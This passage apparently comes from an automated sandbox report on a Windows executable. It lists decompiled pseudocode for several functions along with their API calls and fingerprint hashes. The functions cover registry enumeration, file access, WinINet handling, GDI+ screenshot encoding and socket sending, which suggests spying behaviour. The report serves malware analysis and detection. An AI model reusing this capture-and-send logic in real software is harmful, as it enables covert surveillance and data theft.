    APIs
      • Part of subcall function 00414C40: select.WS2_32(00000000,?,00000000,00000000,00007531), ref: 00414CC0
      • Part of subcall function 00414C40: recv.WS2_32(00000104,?,00000001,00000000), ref: 00414CD0
      • Part of subcall function 00414B90: select.WS2_32 ref: 00414BF1
      • Part of subcall function 00414B90: recv.WS2_32(?,?,00000007,00000000), ref: 00414C01
    • HeapAlloc.KERNEL32(?,00000008,00000404), ref: 00406919
      • Part of subcall function 00410740: HeapFree.KERNEL32(?,?,?,0041895B,00000000,00000000,00000000,00000000,0040C6FF,-00002720,00020000,00000000,00000000,?,00000001), ref: 00410752
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heaprecvselect$AllocFree
    • String ID:
    • API String ID: 2756876686-0
    • Opcode ID: e7038a37d01650b98b511b9f7d8eeda9fc9af24b94b655a357c40630a156fa68
    • Instruction ID: a52349a79fa3c7aa71aae239d12b090e3c4574977716c5ddd609077100441058
    • Opcode Fuzzy Hash: e7038a37d01650b98b511b9f7d8eeda9fc9af24b94b655a357c40630a156fa68
    • Instruction Fuzzy Hash: 7A51D1316083058BD724DF65C8807AA73E1BF84308F01493EE99AA73D1DB7DDD558B99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004244A0(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
    				char _v8;
    				intOrPtr _v20;
    				void* _v24;
    				intOrPtr _v28;
    				intOrPtr* _v32;
    				char _v36;
    				void* _v40;
    				void* _v44;
    				void* _v48;
    				char _v49;
    				void* _v60;
    				char _v61;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t47;
    				intOrPtr _t48;
    				intOrPtr _t50;
    				void* _t52;
    				void* _t53;
    				void* _t61;
    				intOrPtr* _t66;
    				void* _t77;
    				intOrPtr _t79;
    				intOrPtr _t81;
    				void* _t86;
    
    				_v49 = 0;
    				_t77 = E00418BD0(_a4, 0x20000000,  *_a8);
    				if(_t77 == 0) {
    					L36:
    					return _v49;
    				}
    				_t86 = E00418C20(_t77);
    				_v40 = _t86;
    				if(_t86 == 0) {
    					goto L36;
    				}
    				_t79 =  *((intOrPtr*)(_t77 + 0xc));
    				if(_t79 < 2 ||  *((char*)(_t86 + _t79 - 1)) != 0 ||  *((char*)(_t86 + _t79 - 2)) != 0 || _t79 == 0) {
    					L35:
    					HeapFree( *0x42e6d4, 0, _t86);
    					goto L36;
    				} else {
    					_t47 = HeapAlloc( *0x42e6d4, 8, _t79 + 4);
    					_v44 = _t47;
    					if(_t47 == 0) {
    						goto L35;
    					}
    					_t61 = _t47;
    					_v48 = _t61;
    					while(1) {
    						_t81 = 0;
    						if(_t86 == 0 ||  *_t86 == 0) {
    							goto L12;
    						}
    						do {
    							_t81 = _t81 + 1;
    						} while ( *((char*)(_t81 + _t86)) != 0);
    						L12:
    						_t66 = _a12;
    						_t48 = 0;
    						_v36 = 0x2a23;
    						_v32 = _t66;
    						if(_t66 == 0 ||  *_t66 == 0) {
    							L16:
    							_v28 = _t48;
    							_v24 = _t86;
    							_v20 = _t81;
    							_v8 = 1;
    							if(E00412090( &_v36) == 0) {
    								_t50 = _t81;
    								if(_t81 != 0xffffffff) {
    									L22:
    									 *((char*)(E00410820(_t61, _t86, _t50) + _t61)) = 0;
    									_t26 = _t81 + 1; // 0x1
    									_t52 = _t61 + _t26;
    									_v60 = _t52;
    									 *_t52 = 0;
    									_t61 = _t52;
    									L23:
    									_t53 = 0;
    									goto L24;
    									do {
    										do {
    											L24:
    											_t86 = _t86 + 1;
    										} while ( *((char*)(_t86 - 1)) != 0);
    										if( *_t86 == 0) {
    											if(_v49 == 1) {
    												if(_t61 == _v44) {
    													_v48 = _t61 - 1;
    												}
    												if(E00418BD0(_a4, 0x20000000,  *_a8) == 0) {
    													_v49 = 0;
    												} else {
    													_v61 = E00418A80(_t56, _a8, _v44, _v48 - _v44 + 1);
    												}
    											}
    											HeapFree( *0x42e6d4, 0, _v44);
    											_t86 = _v40;
    											goto L35;
    										}
    										_t53 = _t53 + 1;
    									} while (_t53 != 1);
    									continue;
    								}
    								_t50 = 0;
    								if(_t86 != 0 &&  *_t86 != 0) {
    									do {
    										_t50 = _t50 + 1;
    									} while ( *((char*)(_t50 + _t86)) != 0);
    								}
    								goto L22;
    							}
    							_v49 = 1;
    							goto L23;
    						} else {
    							do {
    								_t48 = _t48 + 1;
    							} while ( *((char*)(_t48 + _t66)) != 0);
    							goto L16;
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 00418C20: HeapFree.KERNEL32(?,00000000,00000000,00000010,?,00000000,?,?,0041ACB1,?,?,?,743C1521,00000002), ref: 00418C74
    • HeapAlloc.KERNEL32(?,00000008,?), ref: 00424517
    • HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 0042462F
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 00424643
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Free$Alloc
    • String ID: #*
    • API String ID: 3901518246-617327688
    • Opcode ID: 779aef63a4bb1bb7d6f41332fdad755cc3ca6bb1342049ab7c952626a0dd55e2
    • Instruction ID: a6e1a9406171abada64498b1aa2e8fb31b61d3cd93edb728c5cb99cb3c905c8b
    • Opcode Fuzzy Hash: 779aef63a4bb1bb7d6f41332fdad755cc3ca6bb1342049ab7c952626a0dd55e2
    • Instruction Fuzzy Hash: 4D51B270A093A1AFD721CF24A440B6BBBD5EFC6710F84065EE9C487381D678DC85CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00422838(int __esi, void* __eflags) {
    				intOrPtr _t37;
    				void* _t42;
    				intOrPtr _t49;
    				intOrPtr _t52;
    				void* _t58;
    				void* _t64;
    				intOrPtr _t85;
    				void* _t87;
    				void* _t89;
    				int _t90;
    				void* _t97;
    				void* _t100;
    
    				_t90 = __esi;
    				do {
    					_t85 =  *((intOrPtr*)(_t100 + 0x20));
    					 *((intOrPtr*)(_t100 + 0x34)) = _t90 + 1;
    					_t37 = E00416420( *((intOrPtr*)(_t100 + 0x1c)), _t100 + 0xc8, _t100 + 0x44, 0xff);
    					 *((intOrPtr*)(_t100 + 0x14)) = _t37;
    					if(_t37 != 0xffffffff && _t37 != 0) {
    						_t10 = _t97 + 0x1fe; // 0x1fe
    						_t64 = _t10;
    						_t49 = E00416420( *(_t100 + 0x10), _t100 + 0xc8, _t100 + 0x38, 0xff);
    						 *((intOrPtr*)(_t100 + 0x14)) = _t49;
    						if(_t49 != 0xffffffff && _t49 != 0) {
    							_t52 = E00416420( *(_t100 + 0x18), _t100 + 0xc8, _t100 + 0x30, 0xff);
    							 *((intOrPtr*)(_t100 + 0x14)) = _t52;
    							if(_t52 != 0xffffffff && _t52 != 0 && E004212F0(_t85) > 0) {
    								_t89 = E00416580( *(_t100 + 0x10), _t100 + 0xc4, _t100 + 0x4c);
    								if(_t89 < 1 || _t89 > 0xffff) {
    									_t89 = 0x15;
    								}
    								E00424100(0x55, _t100 + 0x58);
    								_push(_t89);
    								_push(_t97);
    								_push( *((intOrPtr*)(_t100 + 0x20)));
    								_t96 =  *((intOrPtr*)(_t100 + 0x30));
    								_push(_t64);
    								_t58 = E00411D10( *((intOrPtr*)(_t100 + 0x20)), 0x311,  *((intOrPtr*)(_t100 + 0x30)), _t100 + 0x58);
    								_t100 = _t100 + 0x14;
    								if(_t58 > 0 && E00410D70(_t100 + 0x1c, _t96, _t58) != 0) {
    									 *((intOrPtr*)(_t100 + 0x1c)) =  *((intOrPtr*)(_t100 + 0x1c)) + 1;
    								}
    							}
    						}
    					}
    					_t90 =  *(_t100 + 0x28);
    					 *((intOrPtr*)(_t100 + 0x34)) = 0x104;
    				} while (RegEnumKeyExW( *(_t100 + 0x10), _t90, _t100 + 0xd4, _t100 + 0x24, 0, 0, 0, 0) == 0);
    				RegCloseKey( *(_t100 + 0x10));
    				_t42 = HeapFree( *0x42e6d4, 0, _t97);
    				if( *((intOrPtr*)(_t100 + 0x1c)) <= 0) {
    					_t42 =  *(_t100 + 0x18);
    					if(_t42 != 0) {
    						_t42 = HeapFree( *0x42e6d4, 0, _t42);
    					}
    					goto L24;
    				} else {
    					_t87 =  *(_t100 + 0x18);
    					if(_t87 == 0) {
    						L24:
    						return _t42;
    					} else {
    						if( *_t87 != 0) {
    							E00424100(0x9c, _t100 + 0x2c8);
    							E0040D880(_t87, 0xcb, _t100 + 0x2c8);
    						}
    						return HeapFree( *0x42e6d4, 0, _t87);
    					}
    				}
    			}

    APIs
      • Part of subcall function 00416420: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
      • Part of subcall function 00416420: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
      • Part of subcall function 00416420: RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B
    • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0042297A
    • RegCloseKey.ADVAPI32(?), ref: 0042298D
    • HeapFree.KERNEL32(?,00000000,00000000,?,00000000), ref: 004229A2
    • HeapFree.KERNEL32(?,00000000,?), ref: 004229E3
    • HeapFree.KERNEL32(?,00000000,?), ref: 00422A01
      • Part of subcall function 00416420: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 004164DB
      • Part of subcall function 00416420: HeapFree.KERNEL32(?,00000000,00000000,?,?,00000000), ref: 004164F5
      • Part of subcall function 00416580: RegOpenKeyExW.ADVAPI32 ref: 004165A6
      • Part of subcall function 00416580: RegQueryValueExW.ADVAPI32(00000001,00000004,00000000,80000001,00000000,?), ref: 004165CB
      • Part of subcall function 00416580: RegCloseKey.ADVAPI32(?), ref: 004165DD
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FreeHeap$Close$OpenQueryValue$EnumEnvironmentExpandStrings
    • String ID:
    • API String ID: 1177184957-0
    • Opcode ID: 393ea42e9c88e46f22c4b284e20c00160a660ce89296dd1b2246a219e52af1ed
    • Instruction ID: ff1161b1b7c403a45acf30915b7bc32c2417ec951aefb7884e4610911f0ac06c
    • Opcode Fuzzy Hash: 393ea42e9c88e46f22c4b284e20c00160a660ce89296dd1b2246a219e52af1ed
    • Instruction Fuzzy Hash: 1C4116713043126BD320DB14ED80FAF77E9ABC4744F44492EF644972D0D7B8D88A879A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004158A0(WCHAR* _a4, signed int _a8) {
    				signed int _t16;
    				signed int _t18;
    				long _t19;
    				int _t20;
    				void* _t22;
    				void* _t24;
    				void* _t27;
    				void* _t32;
    				void* _t34;
    				signed int _t38;
    				long _t40;
    				void** _t44;
    				WCHAR* _t48;
    				void* _t61;
    				void* _t62;
    
    				_t38 = _a8;
    				_t16 = _t38 & 0x00000003;
    				if(_t16 == 0) {
    					_t40 = 0x80000000;
    					goto L6;
    				} else {
    					_t32 = _t16 - 1;
    					if(_t32 == 0) {
    						_t40 = 0x40000000;
    						goto L6;
    					} else {
    						_t18 = _t32 - 1;
    						if(_t18 != 0) {
    							L19:
    							return _t18 | 0xffffffff;
    						} else {
    							_t40 = 0xc0000000;
    							L6:
    							_t18 = _t38 & 0x00000700;
    							_t61 = _t18 - 0x400;
    							if(_t61 > 0) {
    								if(_t18 == 0x500) {
    									L21:
    									_t19 = 1;
    									goto L22;
    								} else {
    									if(_t18 == 0x600) {
    										goto L20;
    									} else {
    										if(_t18 == 0x700) {
    											goto L21;
    										} else {
    											goto L19;
    										}
    									}
    								}
    							} else {
    								if(_t61 == 0) {
    									L15:
    									_t19 = 3;
    									goto L22;
    								} else {
    									_t62 = _t18 - 0x200;
    									if(_t62 > 0) {
    										if(_t18 != 0x300) {
    											goto L19;
    										} else {
    											_t19 = 2;
    											goto L22;
    										}
    									} else {
    										if(_t62 == 0) {
    											L20:
    											_t19 = 5;
    											goto L22;
    										} else {
    											if(_t18 == 0) {
    												goto L15;
    											} else {
    												if(_t18 != 0x100) {
    													goto L19;
    												} else {
    													_t19 = 4;
    													L22:
    													_t48 = _a4;
    													_t20 = CreateFileW(_t48, _t40, 3, 0, _t19, 0x80, 0);
    													_t34 = _t20;
    													if(_t34 == 0xffffffff) {
    														L25:
    														return _t20 | 0xffffffff;
    													} else {
    														_t22 =  *0x42d48c; // 0x0
    														_t44 = HeapAlloc(_t22, 8, 0xc);
    														if(_t44 != 0) {
    															_t24 = 0;
    															if(_t48 == 0) {
    																L33:
    																 *_t44 = _t24;
    																_t44[2] = _a8;
    																_t44[1] = _t34;
    																return _t44;
    															} else {
    																if( *_t48 != 0) {
    																	do {
    																		_t24 = _t24 + 1;
    																	} while (_t48[_t24] != 0);
    																}
    																_t51 = _t24 + _t24;
    																_t27 = _t24 + _t24 + 2;
    																if(_t27 != 0) {
    																	_t24 = HeapAlloc( *0x42e6d4, 8, _t27 + 4);
    																	if(_t24 != 0) {
    																		_t24 = E00410820(_t24, _a4, _t51);
    																	}
    																	goto L33;
    																} else {
    																	 *_t44 = _t27;
    																	_t44[2] = _a8;
    																	_t44[1] = _t34;
    																	return _t44;
    																}
    															}
    														} else {
    															_t20 = CloseHandle(_t34);
    															goto L25;
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000001,00000080,00000000), ref: 00415944
    • HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 00415961
    • CloseHandle.KERNEL32(00000000), ref: 0041596A
    • HeapAlloc.KERNEL32(?,00000008,?), ref: 004159B9
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AllocHeap$CloseCreateFileHandle
    • String ID:
    • API String ID: 541645184-0
    • Opcode ID: 2116d57bcf27c53ff8cd3b82ee7884e4741b4304ef9b494465a42e4c3026cd89
    • Instruction ID: bfb827b524dbe0126626c77bb06dcdecd0b48482eb91457c4ab8ad0666a80945
    • Opcode Fuzzy Hash: 2116d57bcf27c53ff8cd3b82ee7884e4741b4304ef9b494465a42e4c3026cd89
    • Instruction Fuzzy Hash: C531BEB1620A01DBE7209A28EC84BEBB398EBD0330F24492BE551D73D0D62CDCD5875A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040D360(void* __eax, void* __ecx) {
    				void* __ebx;
    				void* __edi;
    				void* _t26;
    				intOrPtr _t29;
    				void* _t38;
    				void* _t44;
    				signed int _t52;
    				intOrPtr _t60;
    				void* _t61;
    				void* _t62;
    				void* _t63;
    				void** _t64;
    				void* _t65;
    				intOrPtr _t66;
    				void* _t67;
    
    				_t66 =  *((intOrPtr*)(_t67 + 0x18));
    				_t63 = __eax;
    				_t44 = __ecx;
    				 *((intOrPtr*)(_t67 + 0x20)) = 2;
    				if(__eax != 0) {
    					_t60 =  *((intOrPtr*)(__eax + 0x14));
    					if(_t60 != 0) {
    						_t26 = HeapAlloc( *0x42e6d4, 0, _t60 + 4);
    						if(_t26 != 0) {
    							_t26 = E00410820(_t26, _t63, _t60);
    						}
    					} else {
    						_t26 = 0;
    					}
    				} else {
    					_t26 = HeapAlloc( *0x42e6d4, 8, 0x34);
    					if(_t26 != 0) {
    						 *((intOrPtr*)(_t26 + 0x14)) = 0x30;
    					}
    				}
    				_t64 = _t66 + 0x14;
    				 *_t64 = _t26;
    				if(_t26 != 0) {
    					_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t66 + 4))))();
    					if(_t29 == 0) {
    						if( *_t64 != 0 && E00418D30(_t64, 1,  *((intOrPtr*)(_t66 + 0x10))) != 0) {
    							_t52 = 3;
    							if( *((char*)(_t44 + 0xe)) == 2) {
    								_t52 = 7;
    							}
    							_t61 = E004130B0(_t52,  *((intOrPtr*)(_t67 + 0x24)),  *((intOrPtr*)(_t44 + 4)),  *_t64, _t31);
    							 *(_t67 + 0x1c) = _t61;
    							if(_t61 != 0) {
    								if(E00413180(_t61, _t67 + 0x18, 0,  *((intOrPtr*)(_t66 + 0xc))) != 0) {
    									_t62 =  *(_t67 + 0x10);
    									_t38 = E00419020( *((intOrPtr*)(_t66 + 0x10)),  *((intOrPtr*)(_t67 + 0x14)), _t62);
    									E004107C0( *_t64);
    									 *_t64 = _t62;
    									if(_t38 != 0) {
    										 *((intOrPtr*)(_t67 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t66 + 8))))();
    									}
    									_t61 =  *(_t67 + 0x1c);
    								}
    								InternetCloseHandle(_t61);
    							}
    						}
    					} else {
    						 *((intOrPtr*)(_t67 + 0x20)) = _t29;
    					}
    					_t65 =  *_t64;
    					if(_t65 != 0) {
    						HeapFree( *0x42e6d4, 0, _t65);
    					}
    				}
    				return  *((intOrPtr*)(_t67 + 0x20));
    			}

    APIs
    • HeapAlloc.KERNEL32(?,00000008,00000034), ref: 0040D385
    • InternetCloseHandle.WININET(00000000), ref: 0040D474
    • HeapFree.KERNEL32(?,00000000,?), ref: 0040D48A
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$AllocCloseFreeHandleInternet
    • String ID:
    • API String ID: 3482572630-0
    • Opcode ID: 4d9a4196873f99b5bb7a4e84b57f3c28e55a175288059e2775d0b9a81e111097
    • Instruction ID: 74fc9e69b0c4592212f1807142f1985e1369a7181b4dffe81a07b123a7425d8f
    • Opcode Fuzzy Hash: 4d9a4196873f99b5bb7a4e84b57f3c28e55a175288059e2775d0b9a81e111097
    • Instruction Fuzzy Hash: 0D4193756003019BD720DF95D940F6BB7E8AF88744F04492DBD84A7384DB78ED09CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E0040F730(void* __eax) {
    				char _v680;
    				char _v808;
    				char _v1068;
    				void* _v1190;
    				void* _v1568;
    				void* _v1628;
    				void* _v1636;
    				void* __esi;
    				void* _t34;
    				short _t36;
    				WCHAR* _t40;
    				int _t41;
    				signed int _t42;
    				WCHAR* _t43;
    				signed char _t50;
    				signed char _t55;
    				signed int _t60;
    				int _t63;
    				void* _t64;
    
    				E00410820(0x42eb80, __eax, 0x1e6);
    				E0041D150( &_v808);
    				E00410820( &_v1068,  &_v680, 0x102);
    				_push(0x1e6);
    				_push(0x42eb80);
    				_push(_t64 + 0x34);
    				_t34 = E00410820();
    				_push(0x1e6);
    				_push(_t34);
    				E00412640( &_v1068);
    				_t36 = 0;
    				while(1) {
    					_t50 =  *((intOrPtr*)(_t36 + 0x42eb70));
    					_t55 =  *((intOrPtr*)(_t64 + _t36 + 0xa8));
    					if(_t50 != _t55) {
    						break;
    					}
    					_t36 = _t36 + 1;
    					if(_t36 < 0x10) {
    						continue;
    					} else {
    						L7:
    						_t40 =  *0x42e954;
    						_t60 = 0;
    						if(_t40 != 0 &&  *_t40 != 0) {
    							do {
    								_t60 = _t60 + 1;
    							} while (_t40[_t60] != 0);
    						}
    						_t63 = 0;
    						if( *0x42e958 != 0) {
    							do {
    								_t63 = _t63 + 1;
    							} while (0x42e958[_t63] != 0);
    						}
    						_t41 = 0;
    						if( *((intOrPtr*)(_t64 + 0x1be)) != 0) {
    							do {
    								_t41 = _t41 + 1;
    							} while ( *((char*)(_t64 + _t41 + 0x1be)) != 0);
    						}
    						_t42 = MultiByteToWideChar(0, 0, _t64 + 0x1ca, _t41, _t64 + 0xc, 0x14);
    						if(_t42 >= 0x14) {
    							_t42 = 0;
    						}
    						 *((short*)(_t64 + 8 + _t42 * 2)) = 0;
    						if(_t60 <= _t63) {
    							L24:
    							return 0;
    						} else {
    							_t43 =  *0x42e954;
    							if(_t43[_t63] != 0x5c || StrCmpNIW(0x42e958, _t43, _t63) != 0 || lstrcmpiW(_t64 + 8,  *0x42e954 + 2 + _t63 * 2) != 0) {
    								goto L24;
    							} else {
    								return 1;
    							}
    						}
    					}
    					L25:
    				}
    				if((_t50 & 0x000000ff) != (_t55 & 0x000000ff)) {
    					goto L24;
    				} else {
    					goto L7;
    				}
    				goto L25;
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000014,?,00000000,000001E6,?,0042EB80,000001E6,?,?,00000102,0042EB80), ref: 0040F82F
    • StrCmpNIW.SHLWAPI(0042E958,?,C4815E01,?,00000000,?,?,00000016,?,?,00000000), ref: 0040F85B
    • lstrcmpiW.KERNEL32(?,?,?,00000016,?,?,00000000), ref: 0040F875
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ByteCharMultiWidelstrcmpi
    • String ID: u5VPhXB
    • API String ID: 1977948566-1119068662
    • Opcode ID: b3c3ccacc7cd96ae787adf447a6a087643d5706117f097b478f1270260d4574d
    • Instruction ID: 5961fea080fe2e4fd14b9dfdc621e6b01ce3f530e28e19340b9262f361ded59d
    • Opcode Fuzzy Hash: b3c3ccacc7cd96ae787adf447a6a087643d5706117f097b478f1270260d4574d
    • Instruction Fuzzy Hash: 9F31EA316042506AE334A765DC45BFB3799AB84780F90883BE446E35D1E67885CE83DA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040A9F0(signed int __eax, intOrPtr _a4) {
    				signed int _t23;
    				void* _t26;
    				void* _t28;
    				signed int _t34;
    				signed int _t35;
    				signed int _t36;
    				void* _t42;
    				void* _t45;
    				intOrPtr* _t49;
    
    				_t35 = _t34 | 0xffffffff;
    				if(_a4 != 0) {
    					_t36 =  *0x42d408; // 0x0
    					_t23 = 0;
    					_t45 =  *0x42d404; // 0x0
    					if(_t36 <= 0) {
    						L8:
    						_t7 = _t36 * 8; // 0x9
    						_t26 = _t36 + _t7 + 9 + _t36 + _t7 + 9 + _t36 + _t7 + 9 + _t36 + _t7 + 9;
    						if(_t26 != 0) {
    							_push(_t26 + 4);
    							if(_t45 != 0) {
    								_t28 = HeapReAlloc( *0x42e6d4, 8, _t45, ??);
    							} else {
    								_t28 = HeapAlloc( *0x42e6d4, 8, ??);
    							}
    							if(_t28 != 0) {
    								_t36 =  *0x42d408; // 0x0
    								goto L17;
    							}
    						} else {
    							if(_t45 != 0) {
    								HeapFree( *0x42e6d4, 0, _t45);
    								_t36 =  *0x42d408; // 0x0
    							}
    							_t28 = 0;
    							L17:
    							_t35 = _t36;
    							 *0x42d408 = _t36 + 1;
    							_t49 = _t28 + (_t35 + _t35 * 8) * 4;
    							 *0x42d404 = _t28;
    							if(_t49 != 0) {
    								goto L18;
    							}
    						}
    					} else {
    						_t42 = _t45;
    						while( *_t42 != 0) {
    							_t23 = _t23 + 1;
    							_t42 = _t42 + 0x24;
    							if(_t23 < _t36) {
    								continue;
    							} else {
    								goto L8;
    							}
    							goto L19;
    						}
    						_t49 = _t45 + (_t23 + _t23 * 8) * 4;
    						_t35 = _t23;
    						if(_t49 != 0) {
    							L18:
    							 *_t49 = _a4;
    							 *((intOrPtr*)(_t49 + 4)) = CreateEventW(0, 0, 0, 0);
    							 *((intOrPtr*)(_t49 + 8)) = 0;
    							 *((intOrPtr*)(_t49 + 0xc)) = 0;
    							 *((intOrPtr*)(_t49 + 0x10)) = 0;
    							 *((intOrPtr*)(_t49 + 0x14)) = 0;
    							 *((intOrPtr*)(_t49 + 0x18)) = 0xffffffff;
    							 *((intOrPtr*)(_t49 + 0x1c)) = 0;
    							 *((intOrPtr*)(_t49 + 0x20)) = 0;
    						} else {
    							goto L8;
    						}
    					}
    					L19:
    					return _t35;
    				} else {
    					return __eax | 0xffffffff;
    				}
    			}













    APIs
    • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,0040AB24,?,0040BD74), ref: 0040AA52
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,0040AB24,?,0040BD74), ref: 0040AAB7
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateEventFreeHeap
    • String ID:
    • API String ID: 3847225737-0
    • Opcode ID: 425e52b32ff9126d9033a2a9494d6238b06a75ea9bfe51b7ddb1aa70a179a242
    • Instruction ID: 7ed1c2aa4d533b445f8c0d06a9eb0118217a9931649683160e035c9c817fc50c
    • Opcode Fuzzy Hash: 425e52b32ff9126d9033a2a9494d6238b06a75ea9bfe51b7ddb1aa70a179a242
    • Instruction Fuzzy Hash: 8431A472B003088FC334AF65ED84857B7A8E754315350853EE152A76D0D735B856CF59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 52%
    			E0041EEC0(void* __eax, void* __ecx) {
    				void* _v8;
    				void* _v36;
    				void* _v84;
    				void* _v88;
    				void* _v104;
    				void* _t23;
    				void* _t27;
    				void _t33;
    				signed int _t34;
    				void* _t48;
    				void* _t49;
    				intOrPtr* _t50;
    				void* _t51;
    
    				_push(0);
    				_t34 = 0;
    				_t50 = E0041E910();
    				if(_t50 == 0) {
    					L9:
    					 *(_t51 + 0x24) = 0;
    					__imp__#19( *((intOrPtr*)(_t51 + 0x64)), _t51 + 0x1c, 4, 0);
    					L10:
    					return _t34;
    				}
    				_t23 =  *((intOrPtr*)( *((intOrPtr*)( *_t50 + 0x30))))(_t50, _t51 + 0x1c, 1);
    				if(_t23 == 0 &&  *(_t51 + 0x24) == _t23) {
    					_t27 =  *(_t51 + 0x20) + 4;
    					if(_t27 != 0) {
    						_t49 = HeapAlloc( *0x42e6d4, 8, _t27 + 4);
    						if(_t49 != 0) {
    							_push(_t51 + 0x20);
    							_push( *(_t51 + 0x20));
    							_t8 = _t49 + 4; // 0x4
    							_push(_t50);
    							if( *((intOrPtr*)( *((intOrPtr*)( *_t50 + 0xc))))() == 0) {
    								_t33 =  *(_t51 + 0x20);
    								 *_t49 = _t33;
    								_t48 =  *(_t51 + 0x20) + 4;
    								__imp__#19( *((intOrPtr*)(_t51 + 0x64)), _t49, _t48, 0);
    								_t34 = 0 | _t33 == _t48;
    							}
    							HeapFree( *0x42e6d4, 0, _t49);
    						}
    					}
    				}
    				 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 8))))(_t50);
    				if(_t34 != 0) {
    					goto L10;
    				}
    				goto L9;
    			}

















    APIs
      • Part of subcall function 0041E910: VirtualProtect.KERNEL32(00409C70,000005DC,00000004,?,?,00000000,?,00000000), ref: 0041E92E
      • Part of subcall function 0041E910: LoadLibraryA.KERNEL32 ref: 0041E95D
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041E96D
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0041E979
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0041E985
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0041E991
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041E99D
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041E9A9
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041E9B5
      • Part of subcall function 0041E910: LoadLibraryA.KERNEL32(ole32.dll), ref: 0041EA04
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041EA10
      • Part of subcall function 0041E910: LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041EA23
